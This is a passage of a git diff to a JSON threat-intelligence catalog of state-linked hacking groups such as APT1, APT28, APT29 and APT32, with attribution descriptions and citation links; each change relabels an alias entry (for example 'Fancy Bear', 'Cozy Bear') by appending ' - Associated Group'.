"[APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f) is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. [[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", @@ -405,7 +405,7 @@ } ], "uuid": "583a2f5d-33db-48b0-9809-5183f4d4dbec", - "value": "DynCalc" + "value": "DynCalc - Associated Group" }, { "description": "[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)] [[Moran 2014](https://app.tidalcyber.com/references/15ef155b-7628-4b18-bc53-1d30be4eac5d)]", @@ -419,7 +419,7 @@ } ], "uuid": "3a506347-4e45-4afe-a15a-3c5697ecf07b", - "value": "IXESHE" + "value": "IXESHE - Associated Group" }, { "description": "[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]", @@ -433,7 +433,7 @@ } ], "uuid": "5142b9b1-ad6a-4d7b-b982-9b200169dfe5", - "value": "Numbered Panda" + "value": "Numbered Panda - Associated Group" }, { "description": "[[Moran 2014](https://app.tidalcyber.com/references/15ef155b-7628-4b18-bc53-1d30be4eac5d)]", @@ -447,7 +447,7 @@ } ], "uuid": "1f696314-a0e0-4bc2-8b82-26d7f98bb308", - "value": "DNSCALC" + "value": "DNSCALC - Associated Group" }, { "description": "[APT12](https://app.tidalcyber.com/groups/225314a7-8f40-48d4-9cff-3ec39b177762) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]", @@ -525,7 +525,7 @@ } ], "uuid": "3df7e342-600a-4312-8e16-5496890302d5", - "value": "Deputy Dog" + "value": "Deputy Dog - Associated Group" }, { "description": "[APT17](https://app.tidalcyber.com/groups/5f083251-f5dc-459a-abfc-47a1aa7f5094) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. [[FireEye APT17](https://app.tidalcyber.com/references/a303f97a-72dd-4833-bac7-a421addc3242)]", @@ -580,7 +580,7 @@ } ], "uuid": "5fdf8c44-69f3-4d9b-9258-0bb7758be2e9", - "value": "TG-0416" + "value": "TG-0416 - Associated Group" }, { "description": "[[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)][[Anomali Evasive Maneuvers July 2015](https://app.tidalcyber.com/references/471ae30c-2753-468e-8e4d-6e7a3be599c9)]", @@ -594,7 +594,7 @@ } ], "uuid": "637ac710-fc16-472c-a832-4cac678250f8", - "value": "Dynamite Panda" + "value": "Dynamite Panda - Associated Group" }, { "description": "[[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)]", @@ -608,7 +608,7 @@ } ], "uuid": "3a92b51b-3fb6-4792-99f3-dfd2e16f9d8b", - "value": "Threat Group-0416" + "value": "Threat Group-0416 - Associated Group" }, { "description": "[APT18](https://app.tidalcyber.com/groups/a0c31021-b281-4c41-9855-436768299fe7) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. [[Dell Lateral Movement](https://app.tidalcyber.com/references/fcc9b52a-751f-4985-8c32-7aaf411706ad)]", @@ -657,7 +657,7 @@ } ], "uuid": "6d83a49f-9211-4cba-ac43-e00ac72377db", - "value": "Codoso" + "value": "Codoso - Associated Group" }, { "description": "[[Unit 42 C0d0so0 Jan 2016](https://app.tidalcyber.com/references/c740fc1c-093e-4389-890e-1fd88a824df4)]", @@ -671,7 +671,7 @@ } ], "uuid": "89f839e7-602e-4862-9f93-1092acec19e7", - "value": "C0d0so0" + "value": "C0d0so0 - Associated Group" }, { "description": "[[FireEye APT Groups](https://app.tidalcyber.com/references/5b6b909d-870a-4d14-85ec-6aa14e598740)]", @@ -685,7 +685,7 @@ } ], "uuid": "e5363e5c-073d-4bb4-9c68-9944251ff7a8", - "value": "Codoso Team" + "value": "Codoso Team - Associated Group" }, { "description": "[[Dark Reading Codoso Feb 2015](https://app.tidalcyber.com/references/c24035b1-2021-44ae-b01e-651e44526737)]", @@ -699,7 +699,7 @@ } ], "uuid": "1447143d-e8bf-448d-92df-67f19ac2e850", - "value": "Sunshop Group" + "value": "Sunshop Group - Associated Group" }, { "description": "[APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. [[FireEye APT19](https://app.tidalcyber.com/references/d75508b1-8b85-47c9-a087-bc64e8e4cb33)] Some analysts track [APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) and [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) as the same group, but it is unclear from open source information if the groups are the same. [[ICIT China's Espionage Jul 2016](https://app.tidalcyber.com/references/1a824860-6978-454d-963a-a56414a4312b)] [[FireEye APT Groups](https://app.tidalcyber.com/references/5b6b909d-870a-4d14-85ec-6aa14e598740)] [[Unit 42 C0d0so0 Jan 2016](https://app.tidalcyber.com/references/c740fc1c-093e-4389-890e-1fd88a824df4)]", @@ -762,7 +762,7 @@ } ], "uuid": "9d19037b-5996-473a-9c75-1896ba436adc", - "value": "VIOLIN PANDA" + "value": "VIOLIN PANDA - Associated Group" }, { "description": "", @@ -778,7 +778,7 @@ } ], "uuid": "f233d85e-9274-4e5d-9eb8-57fa3dc6bebf", - "value": "TH3Bug" + "value": "TH3Bug - Associated Group" }, { "description": "[[Unit 42 ATOM Crawling Taurus](/references/75098b2c-4928-4e3f-9bcc-b4f6b8de96f8)]", @@ -794,7 +794,7 @@ } ], "uuid": "c8c1b25e-4066-44c1-bb17-f561c86d8202", - "value": "Crawling Taurus" + "value": "Crawling Taurus - Associated Group" }, { "description": "[[Mandiant APT Groups List](/references/c984fcfc-1bfd-4b1e-9034-a6ff3e6ebf97)]", @@ -810,7 +810,7 @@ } ], "uuid": "276fd84a-14fa-4040-9a98-f5eb09a24f3f", - "value": "Twivy" + "value": "Twivy - Associated Group" }, { "description": "APT20 is a suspected China-attributed espionage actor. It has attacked organizations in a wide range of verticals for data theft. These operations appear to be motivated by the acquisition of intellectual property but also collection of information around individuals with particular political interests.[[Mandiant APT Groups List](/references/c984fcfc-1bfd-4b1e-9034-a6ff3e6ebf97)] Researchers attributed, with medium confidence, the years-long Operation Wocao espionage campaign to APT20.[[FoxIT Wocao December 2019](/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]", @@ -886,7 +886,7 @@ } ], "uuid": "fc8d868d-e3df-486d-8efb-eed4d3554abe", - "value": "IRON TWILIGHT" + "value": "IRON TWILIGHT - Associated Group" }, { "description": "This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://app.tidalcyber.com/software/d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae).[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)][[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)][[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)][[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)]", @@ -900,7 +900,7 @@ } ], "uuid": "78e2b73c-4042-4c78-af27-c289450e9db1", - "value": "Sednit" + "value": "Sednit - Associated Group" }, { "description": "This designation has been used in reporting both to refer to the threat group and its associated malware.[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)][[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)][[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)][[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)][[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)]", @@ -914,7 +914,7 @@ } ], "uuid": "8983bc4c-26f9-4d1b-a32d-5b198f90cc24", - "value": "Sofacy" + "value": "Sofacy - Associated Group" }, { "description": "[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)][[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)][[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)][[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)][[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)][[Securelist Sofacy Feb 2018](https://app.tidalcyber.com/references/3a043bba-2451-4765-946b-c1f3bf4aea36)][[Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://app.tidalcyber.com/references/e70f0742-5f3e-4701-a46b-4a58c0281537)]", @@ -928,7 +928,7 @@ } ], "uuid": "78894876-29d5-4feb-9afa-d7ab2955b81b", - "value": "Fancy Bear" + "value": "Fancy Bear - Associated Group" }, { "description": "[[Accenture SNAKEMACKEREL Nov 2018](https://app.tidalcyber.com/references/c38d021c-d84c-4aa7-b7a5-be47e18df1d8)]", @@ -942,7 +942,7 @@ } ], "uuid": "7f58eb05-a22c-4df9-a8ad-6e3dfa97e511", - "value": "SNAKEMACKEREL" + "value": "SNAKEMACKEREL - Associated Group" }, { "description": "[[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]", @@ -956,7 +956,7 @@ } ], "uuid": "7f1b55a8-6645-4262-ba7f-8f3e9d372f10", - "value": "Swallowtail" + "value": "Swallowtail - Associated Group" }, { "description": "[[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)]", @@ -970,7 +970,7 @@ } ], "uuid": "cf66714e-7dc7-44dc-b594-c7ee99610bc2", - "value": "Group 74" + "value": "Group 74 - Associated Group" }, { "description": "[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)][[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)][[TrendMicro Pawn Storm Dec 2020](https://app.tidalcyber.com/references/3bc249cd-f29a-4a74-a179-a6860e43683f)] ", @@ -984,7 +984,7 @@ } ], "uuid": "c9b8f211-b713-4e51-8442-e494c4c56e8b", - "value": "Pawn Storm" + "value": "Pawn Storm - Associated Group" }, { "description": "[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)][[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)][[Microsoft STRONTIUM Aug 2019](https://app.tidalcyber.com/references/7efd3c8d-5e69-4b6f-8edb-9186abdf0e1a)][[Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020](https://app.tidalcyber.com/references/0a65008c-acdd-40fa-af1a-3d9941af8eac)][[TrendMicro Pawn Storm Dec 2020](https://app.tidalcyber.com/references/3bc249cd-f29a-4a74-a179-a6860e43683f)][[Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://app.tidalcyber.com/references/e70f0742-5f3e-4701-a46b-4a58c0281537)]", @@ -998,7 +998,7 @@ } ], "uuid": "f7c8de7a-3322-48b4-917c-e2ffd433890b", - "value": "STRONTIUM" + "value": "STRONTIUM - Associated Group" }, { "description": "[[U.S. Federal Bureau of Investigation 2 27 2024](/references/962fb031-dfd1-43a7-8202-3a2231b0472b)]", @@ -1014,7 +1014,7 @@ } ], "uuid": "5ef741d0-4089-4ca7-aed9-da91b36b75c9", - "value": "Forest Blizzard" + "value": "Forest Blizzard - Associated Group" }, { "description": "[[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)][[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)][[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)]", @@ -1028,7 +1028,7 @@ } ], "uuid": "afa355ce-eb36-498d-b9e4-e0d6bce1573f", - "value": "Tsar Team" + "value": "Tsar Team - Associated Group" }, { "description": "[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)]", @@ -1042,7 +1042,7 @@ } ], "uuid": "f31dcaf0-e808-4073-9b57-88030e5842bb", - "value": "Threat Group-4127" + "value": "Threat Group-4127 - Associated Group" }, { "description": "[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)]", @@ -1056,7 +1056,7 @@ } ], "uuid": "8d33359e-a3fc-4423-a84a-82081e99fb82", - "value": "TG-4127" + "value": "TG-4127 - Associated Group" }, { "description": "[APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.[[NSA/FBI Drovorub August 2020](https://app.tidalcyber.com/references/d697a342-4100-4e6b-95b9-4ae3ba80924b)][[Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://app.tidalcyber.com/references/e70f0742-5f3e-4701-a46b-4a58c0281537)] This group has been active since at least 2004.[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)][[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)][[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)][[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)][[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)][[GRIZZLY STEPPE JAR](https://app.tidalcyber.com/references/4b26d274-497f-49bc-a2a5-b93856a49893)][[Sofacy DealersChoice](https://app.tidalcyber.com/references/ec157d0c-4091-43f5-85f1-a271c4aac1fc)][[Palo Alto Sofacy 06-2018](https://app.tidalcyber.com/references/a32357eb-3226-4bee-aeed-d2fbcfa52da0)][[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)][[ESET Zebrocy May 2019](https://app.tidalcyber.com/references/f8b837fb-e46c-4153-8e86-dc4b909b393a)]\n\n[APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. [[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)] In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.[[US District Court Indictment GRU Oct 2018](https://app.tidalcyber.com/references/56aeab4e-b046-4426-81a8-c3b2323492f0)] Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666). ", @@ -1224,7 +1224,7 @@ } ], "uuid": "573520e2-7034-4610-b254-f58fd4330e9c", - "value": "StellarParticle" + "value": "StellarParticle - Associated Group" }, { "description": "[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)][[MSTIC NOBELIUM May 2021](https://app.tidalcyber.com/references/047ec63f-1f4b-4b57-9ab5-8a5cfcc11f4d)][[MSTIC Nobelium Toolset May 2021](https://app.tidalcyber.com/references/52464e69-ff9e-4101-9596-dd0c6404bf76)][[MSRC Nobelium June 2021](https://app.tidalcyber.com/references/1588799f-a5d2-46bc-978d-f10ed7ceb15c)]", @@ -1238,7 +1238,7 @@ } ], "uuid": "a51f4654-cba5-4052-8d79-a8671339eb9e", - "value": "NOBELIUM" + "value": "NOBELIUM - Associated Group" }, { "description": "[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)][[NCSC APT29 July 2020](https://app.tidalcyber.com/references/28da86a6-4ca1-4bb4-a401-d4aa469c0034)][[Cybersecurity Advisory SVR TTP May 2021](https://app.tidalcyber.com/references/e18c1b56-f29d-4ea9-a425-a6af8ac6a347)][[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]", @@ -1252,7 +1252,7 @@ } ], "uuid": "0742ac72-9dc7-40ba-b568-1185187d93a8", - "value": "Cozy Bear" + "value": "Cozy Bear - Associated Group" }, { "description": "[[Secureworks IRON HEMLOCK Profile](https://app.tidalcyber.com/references/36191a48-4661-42ea-b194-2915c9b184f3)]", @@ -1266,7 +1266,7 @@ } ], "uuid": "1e5b89db-5d7c-40f0-86a2-ab7affabd6c3", - "value": "IRON HEMLOCK" + "value": "IRON HEMLOCK - Associated Group" }, { "description": "[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]", @@ -1280,7 +1280,7 @@ } ], "uuid": "c0b8d1d5-4412-44b7-ba21-d2f0c96be941", - "value": "Dark Halo" + "value": "Dark Halo - Associated Group" }, { "description": "[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)][[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)][[NCSC APT29 July 2020](https://app.tidalcyber.com/references/28da86a6-4ca1-4bb4-a401-d4aa469c0034)][[Cybersecurity Advisory SVR TTP May 2021](https://app.tidalcyber.com/references/e18c1b56-f29d-4ea9-a425-a6af8ac6a347)]", @@ -1294,7 +1294,7 @@ } ], "uuid": "b9af22de-f6b0-4b07-9182-1d43179e1d31", - "value": "The Dukes" + "value": "The Dukes - Associated Group" }, { "description": "[[Unit 42 SolarStorm December 2020](https://app.tidalcyber.com/references/ecbb602a-2427-5eba-8c2b-25d90c95f166)]", @@ -1308,7 +1308,7 @@ } ], "uuid": "7a10ed9e-6744-5657-bc4f-dfea05a89105", - "value": "SolarStorm" + "value": "SolarStorm - Associated Group" }, { "description": "[[PWC WellMess July 2020](https://app.tidalcyber.com/references/22794e37-3c55-444a-b659-e5a1a6bc2da0)][[PWC WellMess C2 August 2020](https://app.tidalcyber.com/references/3afca6f1-680a-46ae-8cea-10b6b870d5e7)]", @@ -1322,7 +1322,7 @@ } ], "uuid": "e6294fb3-cd59-57de-a0a6-d19f4d2a1560", - "value": "Blue Kitsune" + "value": "Blue Kitsune - Associated Group" }, { "description": "[[Mandiant APT29 Eye Spy Email Nov 22](https://app.tidalcyber.com/references/452ca091-42b1-5bef-8a01-921c1f46bbee)]", @@ -1336,7 +1336,7 @@ } ], "uuid": "d381c0b3-36d6-5619-9111-e392345eb22d", - "value": "UNC3524" + "value": "UNC3524 - Associated Group" }, { "description": "[[Microsoft Midnight Blizzard January 19 2024](/references/91b48ddd-9e3f-4d36-a262-3b52145b3db2)]", @@ -1352,7 +1352,7 @@ } ], "uuid": "4f1c2576-e3bb-4cd0-8d9f-df4cde4db79d", - "value": "Midnight Blizzard" + "value": "Midnight Blizzard - Associated Group" }, { "description": "[[Secureworks IRON RITUAL Profile](https://app.tidalcyber.com/references/c1ff66d6-3ea3-4347-8a8b-447cd8b48dab)]", @@ -1366,7 +1366,7 @@ } ], "uuid": "f26c70ba-7879-4083-bfd0-ec34bdb80416", - "value": "IRON RITUAL" + "value": "IRON RITUAL - Associated Group" }, { "description": "[[SentinelOne NobleBaron June 2021](https://app.tidalcyber.com/references/98cf2bb0-f36c-45af-8d47-bf26aca3bb09)]", @@ -1380,7 +1380,7 @@ } ], "uuid": "7a8aa751-21a3-4fdc-b19b-2810ffb4f44f", - "value": "NobleBaron" + "value": "NobleBaron - Associated Group" }, { "description": "[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)]", @@ -1394,7 +1394,7 @@ } ], "uuid": "b9ef525d-16a2-4896-8205-6da397b37245", - "value": "UNC2452" + "value": "UNC2452 - Associated Group" }, { "description": "[[Microsoft Unidentified Dec 2018](https://app.tidalcyber.com/references/896c88f9-8765-4b60-b679-667b338757e3)]", @@ -1408,7 +1408,7 @@ } ], "uuid": "f60a21a2-2a87-4e54-99df-f78ab1a7fd26", - "value": "YTTRIUM" + "value": "YTTRIUM - Associated Group" }, { "description": "[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]", @@ -1422,7 +1422,7 @@ } ], "uuid": "c71bf5f1-a297-4b10-8d66-3f61bd0b2a25", - "value": "CozyDuke" + "value": "CozyDuke - Associated Group" }, { "description": "[APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).[[White House Imposing Costs RU Gov April 2021](https://app.tidalcyber.com/references/c2bf9e2f-cd0a-411d-84bc-61454a369c6b)][[UK Gov Malign RIS Activity April 2021](https://app.tidalcyber.com/references/7fe5a605-c33e-4d3d-b787-2d1f649bee53)] They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) reportedly compromised the Democratic National Committee starting in the summer of 2015.[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)][[GRIZZLY STEPPE JAR](https://app.tidalcyber.com/references/4b26d274-497f-49bc-a2a5-b93856a49893)][[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[UK Gov UK Exposes Russia SolarWinds April 2021](https://app.tidalcyber.com/references/ffbd83d7-9d4f-42b9-adc0-eb144045aef2)]\n\nIn April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) to the SVR; public statements included citations to [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447), Cozy Bear, and The Dukes.[[NSA Joint Advisory SVR SolarWinds April 2021](https://app.tidalcyber.com/references/43d9c469-1d54-454b-ba67-74e7f1de9c10)][[UK NSCS Russia SolarWinds April 2021](https://app.tidalcyber.com/references/f49e6780-8caa-4c3c-8d68-47a2cc4319a1)] Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)][[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)][[CrowdStrike SUNSPOT Implant January 2021](https://app.tidalcyber.com/references/3a7b71cf-961a-4f63-84a8-31b43b18fb95)][[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)][[Cybersecurity Advisory SVR TTP May 2021](https://app.tidalcyber.com/references/e18c1b56-f29d-4ea9-a425-a6af8ac6a347)][[Unit 42 SolarStorm December 2020](https://app.tidalcyber.com/references/ecbb602a-2427-5eba-8c2b-25d90c95f166)]", @@ -1591,7 +1591,7 @@ } ], "uuid": "d447bfdc-0a5c-4651-9070-2b3b87ac2128", - "value": "Gothic Panda" + "value": "Gothic Panda - Associated Group" }, { "description": "[[PWC Pirpi Scanbox](https://app.tidalcyber.com/references/4904261a-a3a9-4c3e-b6a7-079890026ee2)]", @@ -1605,7 +1605,7 @@ } ], "uuid": "feff078c-cd96-4e56-90a7-4310ae8e48cb", - "value": "Pirpi" + "value": "Pirpi - Associated Group" }, { "description": "[[FireEye Clandestine Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)] [[Recorded Future APT3 May 2017](https://app.tidalcyber.com/references/a894d79f-5977-4ef9-9aa5-7bfec795ceb2)] [[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]", @@ -1619,7 +1619,7 @@ } ], "uuid": "bceffa47-b63a-4ebf-bded-33cb633c5ea7", - "value": "UPS Team" + "value": "UPS Team - Associated Group" }, { "description": "[[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]", @@ -1633,7 +1633,7 @@ } ], "uuid": "4149bb91-e34b-4d22-80f1-e8adfab0d17f", - "value": "Buckeye" + "value": "Buckeye - Associated Group" }, { "description": "[[Recorded Future APT3 May 2017](https://app.tidalcyber.com/references/a894d79f-5977-4ef9-9aa5-7bfec795ceb2)] [[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]", @@ -1647,7 +1647,7 @@ } ], "uuid": "9eac64b2-f6ac-4a34-98c9-b159337fbea8", - "value": "Threat Group-0110" + "value": "Threat Group-0110 - Associated Group" }, { "description": "[[Recorded Future APT3 May 2017](https://app.tidalcyber.com/references/a894d79f-5977-4ef9-9aa5-7bfec795ceb2)] [[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]", @@ -1661,7 +1661,7 @@ } ], "uuid": "a62a6f94-d301-4cf8-b67e-662fd7f91d73", - "value": "TG-0110" + "value": "TG-0110 - Associated Group" }, { "description": "[APT3](https://app.tidalcyber.com/groups/9da726e6-af02-49b8-8ebe-7ea4235513c9) is a China-based threat group that researchers have attributed to China's Ministry of State Security.[[FireEye Clandestine Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)][[Recorded Future APT3 May 2017](https://app.tidalcyber.com/references/a894d79f-5977-4ef9-9aa5-7bfec795ceb2)] This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.[[FireEye Clandestine Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)][[FireEye Operation Double Tap](https://app.tidalcyber.com/references/4b9af128-98da-48b6-95c7-8d27979c2ab1)] As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.[[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]\n\nIn 2017, MITRE developed an APT3 Adversary Emulation Plan.[[APT3 Adversary Emulation Plan](https://app.tidalcyber.com/references/64c01921-c33f-402e-b30d-a2ba26583a24)]", @@ -1764,7 +1764,7 @@ } ], "uuid": "60ed0464-1075-4f6d-b72d-4aaa2892d2c9", - "value": "OceanLotus" + "value": "OceanLotus - Associated Group" }, { "description": "[[ESET OceanLotus](https://app.tidalcyber.com/references/a7bcbaca-10c1-403a-9eb5-f111af1cbf6a)][[Cybereason Oceanlotus May 2017](https://app.tidalcyber.com/references/1ef3025b-d4a9-49aa-b744-2dbea10a0abf)][[ESET OceanLotus Mar 2019](https://app.tidalcyber.com/references/b2745f5c-a181-48e1-b1cf-37a1ffe1fdf0)][[Amnesty Intl. Ocean Lotus February 2021](https://app.tidalcyber.com/references/a54a2f68-8406-43ab-8758-07edd49dfb83)]", @@ -1778,7 +1778,7 @@ } ], "uuid": "6be3ad40-e776-4127-81d2-c24a7e2b6778", - "value": "APT-C-00" + "value": "APT-C-00 - Associated Group" }, { "description": "[[Cybereason Oceanlotus May 2017](https://app.tidalcyber.com/references/1ef3025b-d4a9-49aa-b744-2dbea10a0abf)]", @@ -1792,7 +1792,7 @@ } ], "uuid": "510b8ec4-efad-41e0-8f0b-68c70a3d92e0", - "value": "SeaLotus" + "value": "SeaLotus - Associated Group" }, { "description": "[APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on 